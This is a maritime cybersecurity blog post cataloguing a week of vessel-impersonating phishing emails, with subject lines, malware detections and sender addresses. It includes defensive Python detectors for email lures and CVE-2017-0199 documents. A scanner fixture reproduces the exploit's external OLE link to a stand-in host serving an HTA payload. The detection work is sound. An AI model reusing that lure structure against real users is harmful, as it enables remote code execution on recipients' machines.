Maritime Cyber Security & Threats Oct 2020 Week Three
By: Dryad Global on October 29, 2020 at 1:33 PM
Dryad and our cyber partner Red Sky Alliance continue to monitor attempted attacks on the maritime sector. Here we continue to examine how email is used to deceive recipients and expose the targeted organisations.
"Fraudulent emails designed to make recipients hand over sensitive information, extort money or trigger malware installation on shore-based or vessel IT networks remain one of the biggest day-to-day cyber threats facing the maritime industry."
Dryad Global's cyber security partner, Red Sky Alliance, runs weekly queries against its backend databases to identify all newly collected malicious emails whose subject line contains "MV" (Motor Vessel) or "MT" (Motor Tanker). These keywords are a common lure used to entice staff in the maritime industry into opening emails that carry malicious attachments.
Together with our cyber security partner we publish a weekly list of motor vessels observed being impersonated, with the associated malicious emails.
The identified emails attempted to deliver malware or phishing links to compromise the vessels and/or their parent companies. Users should be aware of the subject lines used and of the email addresses attempting to deliver the messages.
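As an added example (not code from this page or from Red Sky Alliance), the following Python script applies the same subject-line query to raw messages and adds a second check that the collection below makes visible: a display name that is itself an email address on a different domain from the real sending address. The sample messages are constructed to resemble rows of the collection; bodies, recipient addresses and attachment bytes are placeholders, and the `watchlist` parameter is a hypothetical hook where a weekly vessel impersonation list would plug in.

```python
import re
from email import policy
from email.parser import BytesParser

# Coarse lure heuristic matching the weekly query: the keyword "MV" or "MT"
# (optionally "MV.") followed by a capitalised vessel name.
VESSEL_PREFIX = re.compile(r"\b(?:MV|MT|Mv|Mt)\.?\s+([A-Z][\w.-]*(?:\s+[A-Z][\w.-]*)*)")

# Attachment types the collection delivered (Office documents and RTF).
OFFICE_EXT = (".doc", ".docx", ".docm", ".xls", ".xlsx", ".xlsm", ".rtf")


def vessel_lure(subject, watchlist=()):
    """Return the vessel name a subject line is trading on, or None.
    Names without an MV/MT prefix (e.g. "Norstar Baltic") are only caught
    when supplied in `watchlist` (hypothetical hook for the weekly list)."""
    m = VESSEL_PREFIX.search(subject)
    if m:
        return m.group(1)
    upper = subject.upper()
    for name in watchlist:
        if name.upper() in upper:
            return name
    return None


def sender_mismatch(msg):
    """Flag a display name that is itself an email address on a different
    domain from the actual sending address, as in
    "ssun@suntex.co.za" <1d23ac1ceaa6d53@2ffb39a.com>. Returns (shown, actual)."""
    addrs = getattr(msg["From"], "addresses", ())
    if not addrs:
        return None
    display = addrs[0].display_name.strip()
    actual = addrs[0].addr_spec.lower()
    if re.fullmatch(r"[^@\s]+@[^@\s]+", display):
        shown = display.lower()
        if shown.rsplit("@", 1)[1] != actual.rsplit("@", 1)[1]:
            return (shown, actual)
    return None


def triage(raw, watchlist=()):
    """Score one raw RFC 5322 message against the indicators above."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    subject = str(msg["Subject"] or "")
    office = [p.get_filename() for p in msg.iter_attachments()
              if (p.get_filename() or "").lower().endswith(OFFICE_EXT)]
    findings = {
        "vessel_lure": vessel_lure(subject, watchlist),
        "sender_mismatch": sender_mismatch(msg),
        "office_attachments": office,
    }
    findings["score"] = sum(1 for v in findings.values() if v)
    return findings


# Constructed messages modelled on rows of the collection (bodies, recipients
# and attachment bytes are placeholders, not the real payloads).
SAMPLES = {
    "sea_ruby": (
        b'From: "Capt S. J. MOON" <caf9@7f2e96db3194.com>\r\n'
        b"To: master@example.invalid\r\n"
        b"Subject: CTM TO MASTER OF MV. SEA RUBY\r\n"
        b"MIME-Version: 1.0\r\n"
        b'Content-Type: multipart/mixed; boundary="b1"\r\n'
        b"\r\n--b1\r\nContent-Type: text/plain\r\n\r\nDear Sir, see attached CTM.\r\n"
        b"--b1\r\nContent-Type: application/octet-stream\r\n"
        b'Content-Disposition: attachment; filename="CTM.docx"\r\n'
        b"Content-Transfer-Encoding: base64\r\n\r\nUEsDBBQAAAAI\r\n--b1--\r\n"
    ),
    "container": (
        b'From: "ssun@suntex.co.za" <1d23ac1ceaa6d53@2ffb39a.com>\r\n'
        b"To: accounts@example.invalid\r\n"
        b"Subject: Re: Container Arrival\r\n"
        b"MIME-Version: 1.0\r\n"
        b'Content-Type: multipart/mixed; boundary="b2"\r\n'
        b"\r\n--b2\r\nContent-Type: text/plain\r\n\r\nPlease confirm arrival.\r\n"
        b"--b2\r\nContent-Type: application/msword\r\n"
        b'Content-Disposition: attachment; filename="Arrival.doc"\r\n'
        b"Content-Transfer-Encoding: base64\r\n\r\n0M8R4KGxGuE=\r\n--b2--\r\n"
    ),
    "benign": (
        b'From: "Ops Desk" <ops@example.invalid>\r\n'
        b"To: crew@example.invalid\r\n"
        b"Subject: Weekly schedule\r\n"
        b"MIME-Version: 1.0\r\n"
        b"Content-Type: text/plain\r\n"
        b"\r\nNo changes this week.\r\n"
    ),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, triage(raw, watchlist=("Norstar Baltic",)))
```

The score is deliberately simple: any message that hits two of the three indicators is worth holding for analyst review, and the watchlist is what turns the generic MV/MT query into a match on the specific names reported each week.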
Malicious email collection, 17 Oct - 24 Oct 2020

First Seen | Subject Line Used | Malware Detections | Sending Email | Targets
--- | --- | --- | --- | ---
Oct 19, 2020 | Re: Bulk Cargo Shipment for sales@innotab.com | Exploit:Win32/CVE-2017-11882!ml | "Chen Xin" <felix.chen@longsailing.net> | innotab.com
Oct 19, 2020 | CTM TO MASTER OF MV. SEA RUBY | TrojanDownloader:O97M/Obfuse!MTB | "Capt S. J. MOON" <caf9@7f2e96db3194.com> | 5d104289d17.za
Oct 20, 2020 | Payment details from Sea Pine Power Limited | Trojan:Win32/Woreflint.A!cl | "Viky" <hr@maheendran.pw> | Targets not disclosed
Oct 20, 2020 | PO 14704 - MEL - 20' TC Reefer / Sailing Schedule | Trojan:Script/Wacatac.C!ml | "Pakkaporn Srisuk" <info2@s-world.co.th> | fametech.com.tw
Oct 20, 2020 | Re: [NAPAfrica Peers] Nap port down | Trojan-Downloader.VBA.Emotet | "Peers" <d16e3529f8e5e93e@b684bc0279577cd573.com> | 801c409e90ac02.net
Oct 20, 2020 | WG: PO 14704 - MEL - 20' TC Reefer / Sailing Schedule | Trojan:Win32/Woreflint.A!cl | "Seiler Stephan" <jgenaro@pernoscorona.net> | hoffmanneitle.com
Oct 20, 2020 | Re: Bigfoot Express Freight: Statement, | VBA/TrojanDownloader.Agent.UFY | "debtors1@bigfootexpress.co.za" <1b9644c86f@695e866eff3.mx> | 6f608b02d.za
Oct 20, 2020 | Re: Container Arrival | Trojan.W97M.EMOTET.SMBA | "ssun@suntex.co.za" <1d23ac1ceaa6d53@2ffb39a.com> | 6f608b02d.za
Oct 20, 2020 | Re: Request of Vessel information for ESI (Environmental Ship Index) | W97M/Downloader.dfu | <paola@formatolibero.it> | smlines.com
Oct 21, 2020 | RE: OCEAN GIFT PO: Yêu cầu báo giá WK49 - GB-75030-508034041 - OCEAN GIFT VIETNAM ORDER - OCTOBER 2020 | HEUR:Exploit.MSOffice.CVE-2017-0199.a | "Chien Dang" <Chien.Dang@icore.com.vn> | icore.com.vn
Oct 21, 2020 | SEA BOOKING// BUYER# AZ PLANNING CO. LTD. | Trojan-Downloader.MSWord.Agent.buh | "Sakil-Starlet" <com@starletbd.com> | xinhua.org
Oct 21, 2020 | Mv Tiksy / Disch anthracite Asd - update prospects | VBA/TrojanDownloader.Agent.USA | "Tom Koster" <gianna@lapiramidesrl.it> | c-star-resources.net
Oct 23, 2020 | Norstar Baltic // 10,000mt Benzene // PDA Request | Trojan:Win32/Woreflint.A!cl | "Sinosteel Shipping Agency" <oper@dowausa.com> | hlcfinancier.com
In the collection above, malicious actors use vessel names to impersonate companies in the maritime supply chain. This week we observed a wide variety of maritime-related subject lines. New vessel names used this week include "MV Sea Ruby", "Mv Tiksy" and "Norstar Baltic", among others. Two of the messages (the "Bigfoot Express Freight" and "Container Arrival" replies) also place a legitimate-looking address in the display name while the actual sending address sits on an unrelated domain, so recipients should check the address in angle brackets rather than the name shown by the mail client.
Analysts observed the malicious subject line "SEA BOOKING// BUYER# AZ PLANNING CO. LTD." in use this week. It appears to be a mass-mailed spam message sent to numerous recipients, and several features of the email point to this.
The message opens with the generic greeting "Dear Sir", which attackers commonly use in malicious spam. The sender refers to the attached "invoice" but never identifies which shipment or shipping order is being discussed, and the grammar and phrasing suggest the writer is not a native English speaker.
Interestingly, the target of the email is the Xinhua News Agency, the state-run press agency of the People's Republic of China. There is no obvious legitimate reason to send a news agency an invoice and packing list. The target address, info[at]xinhua[.]org, does not appear to belong to any specific employee; it appears to be the mailbox the agency uses for general inquiries.
The malicious attachment "invoice & Packing list.docx" exploits CVE-2017-0199, a vulnerability in how Office handles linked OLE objects: when the document is opened, Word fetches and executes a payload from an attacker-controlled location. A successful attack therefore gives the attacker arbitrary code execution, i.e. the ability to run commands on the recipient's host remotely.
Analysts also observed the malicious subject line "RE: OCEAN GIFT PO: Yêu cầu báo giá WK49 - GB-75030-508034041 - OCEAN GIFT VIETNAM ORDER - OCTOBER 2020" this week ("Yêu cầu báo giá" is Vietnamese for "request for quotation"), sent from one employee to another at iCore Solutions, a Vietnam-based IT managed service provider.
Although the email originated from an outside source, an employee at the company forwarded it to colleagues as an "FYI". This attachment also exploited CVE-2017-0199, matching the detection listed in the collection above. It is another example of employees becoming unwitting actors in the spread of malware across a company network, and the fact that some of the recipients work for different companies indicates that this could also be an example of a supply chain attack.
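CVE-2017-0199 is the Office/WordPad "OLE2Link" bug: the document carries an OLE object whose relationship points at an external URL, and Word retrieves and runs the linked content (an HTA in the public variants) when the file is opened. The page does not show the inside of "invoice & Packing list.docx", so the following Python scanner, an added example rather than the page's or Red Sky Alliance's code, works on constructed fixtures: it unpacks a .docx and flags any oleObject relationship with TargetMode="External", which is the indicator common YARA rules for this CVE key on. The make_docx helper, the 198.51.100.7 URL and the file names are assumptions for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_REL = REL_NS + "oleObject"


def external_ole_links(docx_bytes):
    """Return (rels_part, target) for every oleObject relationship whose
    TargetMode is External. A benign embedded object is stored inside the
    package and needs no TargetMode; the CVE-2017-0199 lure instead points
    Word at a remote URL from which the payload is fetched on open."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL
                        and rel.get("TargetMode", "Internal") == "External"):
                    hits.append((name, rel.get("Target")))
    return hits


def looks_like_cve_2017_0199(docx_bytes):
    """True when the package links an OLE object to an external target."""
    return bool(external_ole_links(docx_bytes))


def make_docx(rels_xml):
    """Assumed helper: assemble a minimal .docx-shaped package around a given
    document.xml.rels part so the scanner can be exercised offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed fixtures: a benign package with an embedded object, and one
# shaped like the external-OLE lure (the URL is a documentation address).
BENIGN_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{REL_NS}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>
</Relationships>'''

LURE_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{REL_NS}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="http://198.51.100.7/invoice.hta" TargetMode="External"/>
</Relationships>'''

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("lure", LURE_RELS)):
        print(label, external_ole_links(make_docx(rels)))
```

This covers the OOXML form only. The RTF form of the same exploit carries the link inside an \object control word and needs a different parser, and a .docx with no external relationship can still carry the VBA downloaders named in the collection (the O97M, W97M and VBA/ detections), so a mail-gateway check should pair this with macro inspection rather than rely on it alone.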
Top 5 Malicious Senders

Sender | Malware Sent
--- | ---
support@hoffmanneitle.com | MSIL/GenKryptik.EUUO!tr, MSExcel/Kryptik.AE!tr.dldr, W32/GenKryptik.EKLE!tr, VBA/Agent.AVL!tr
noreply@wdc.com | Backdoor.Win32.Androm.ghqa
kontakt@ziegis-zeltverleih.de | Backdoor.Win32.Androm.ghqa
felix.chen@longsailing.net | Exploit:Win32/CVE-2017-11882!ml
s.parvin@computerfutures.de | Backdoor.Win32.Androm.ghqa

Note that hoffmanneitle.com appears both as a target of the "WG: PO 14704" message in the collection above and, as support@hoffmanneitle.com, at the top of the sender list. That pattern is consistent with either a spoofed sender domain or a compromised mailbox being used to reach its own contacts; the data here does not distinguish the two, so the domain should be verified out of band before it is blocked wholesale.
These analytical results illustrate how a recipient could be fooled into opening an infected email. They also demonstrate how common it is for attackers to target individual links in a company's supply chain as stepping stones towards attacks on larger companies. A recipient who opens such a message becomes an infected member of the maritime supply chain and may in turn spread additional malware to vessels, port facilities and/or shore companies in the marine, agricultural and other industries.
Fraudulent emails designed to make recipients hand over sensitive information, extort money or trigger malware installation on shore-based or vessel IT networks remain one of the biggest day-to-day cyber threats facing the maritime industry. These threats often carry a financial liability for one or all of those involved in the maritime transportation supply chain.
Pre-empt, don't just defend
Preventative cyber protection offers a strong first line of defence by stopping deceptive messages before they reach staff inboxes, but attackers develop new techniques to evade current detection daily. Pre-emptive information from the Red Sky Alliance RedXray diagnostic tool, our Vessel Impersonation reports and the Maritime Blacklists offers a proactive way to stop these attacks. Recent studies suggest cyber-criminals research their targets and tailor emails to staff in specific roles. Another tactic is to spoof emails from the chief executive or other senior maritime figures in the hope that staff lower down the supply chain will drop their guard and follow the spoofed instructions. Analysts across the industry are beginning to see maritime-specific examples of these attacks.
The more convincing an email appears, the greater the chance that employees will fall for it. To address this residual risk, software-based protection should be treated as one part of a wider strategy that also covers the human element and organisational workflows and procedures.
It is imperative to:
- Train all levels of the marine supply chain to recognise that they are under constant cyber-attack.
- Keep the real-world consequences of careless cyber practices or general inattentiveness in front of staff at all times.
- Provide practical guidance on how to spot a potential phishing attempt.
- Verify unexpected emails and supply chain requests through a separate, direct channel (for example a phone call to a known number) rather than by replying to the message.
- Use Red Sky Alliance RedXray proactive support, our Vessel Impersonation information and the Maritime Blacklists to proactively block cyber-attacks from identified malicious actors.